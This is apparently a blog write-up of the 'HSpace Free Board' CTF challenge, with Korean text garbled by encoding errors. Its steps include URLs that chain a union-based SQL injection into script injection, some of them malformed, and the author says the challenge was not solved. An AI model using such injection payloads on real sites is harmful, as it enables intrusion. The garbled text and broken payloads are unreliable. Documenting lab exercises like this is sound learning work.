π« HSpace Free Board Write Up
1. λ¬Έμ νμΈ ν μλ΄λ λ§ν¬λ‘ μ μ
++ BlackBox λ¬Έμ λ?
CTF (Capture The Flag) λνμμ "BlackBox λ¬Έμ "λ μ°Έκ°μμκ² μ£Όμ΄μ§ μμ€ν , μλΉμ€ λλ νλ‘κ·Έλ¨μ λν λ΄λΆ λμ λλ μμ€ μ½λμ κ°μ ꡬ체μ μΈ μ 보 μμ΄ λ¬Έμ λ₯Ό ν΄κ²°ν΄μΌ νλ μ νμ 보μ λ¬Έμ λ₯Ό μλ―Ένλ€.
2. μμμ κ³μ μ μμ±νμ¬ νμ κ°μ --> νμ κ°μ ν λ€μ λ‘κ·ΈμΈ μ°½μ΄ λ¬λ€
3. κ°μ ν κ³μ μΌλ‘ λ‘κ·ΈμΈ
4. μ΅νλ¨μ Post λ²νΌμ λλ¬ κΈμ°κΈ° --> μ μμ μΌλ‘ ν¬μ€ν λ κ²μ νμΈ
5. URL μ‘°μμ ν΅ν΄ κ²½κ³ μ°½ λμ°κΈ° μλ --> μ€ν¬λ¦½νΈκ° μ±κ³΅μ μΌλ‘ μ μ©λ¨μ νμΈ
# μμ±ν URL
http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3Ealert(1)%3C/script%3E%27,null
6. μ΄ν νλ¨κ³Ό κ°μ μ€ν¬λ¦½νΈλ€μ μ€ννμ¬ νμ΄λ₯Ό μλνμ§λ§, Error μ°½ λ¬Έμ λ₯Ό ν΄κ²°νμ§ λͺ»ν¨
# μμ±ν URL λ° μ€ν¬λ¦½νΈ
1. http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3E%20function%20goToPage(./flag.php)%20%7B%20window.location.href%20=%20url;%20%7D%20%3C/script%3E%27,null
2. http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3E%20function%20goToPage(flag)%20%7B%20window.location.href%20=%20url;%20%7D%20%3C/script%3E%27,null%27
3. http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3Ealert(200)%3C/script%3E%27,null
4. http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3Ealert(??)%3C/script%3E%27,null
https://studyforall.tistory.com/60
[HSpace CTF] HSpace Free Board
λ¬Έμ μ¬μ΄νΈμ μ μνλ©΄ μ²μμΌλ‘ 보μ΄λ νμ΄μ§μ΄λ€. λ‘κ·ΈμΈνΌμ΄λ€. Sign UP νμ΄μ§λ‘ μ΄λν΄μ νμκ°μ μ νλ€. νμκ°μ ν κ³μ μΌλ‘ λ‘κ·ΈμΈνλ€. Login success! λΌλ μλ¦Όμ°½μ΄ λ¬λ€. κ²μνμ΄ μ
studyforall.tistory.com
'βοΈ Capture The Flag (CTF)' μΉ΄ν κ³ λ¦¬μ λ€λ₯Έ κΈ
| [Patriot CTF 2023] Python XOR Write Up (0) | 2023.09.09 |
|---|---|
| [DownUnder CTF 2023] π Write Up (0) | 2023.09.04 |
| [Hero CTF v5] Hyper Loop Write Up (0) | 2023.05.14 |
| [PwnMe CTF 2023] Tree Viewer WriteUp (0) | 2023.05.07 |
| [PwnMe CTF 2023] Just a XOR WriteUp (0) | 2023.05.06 |
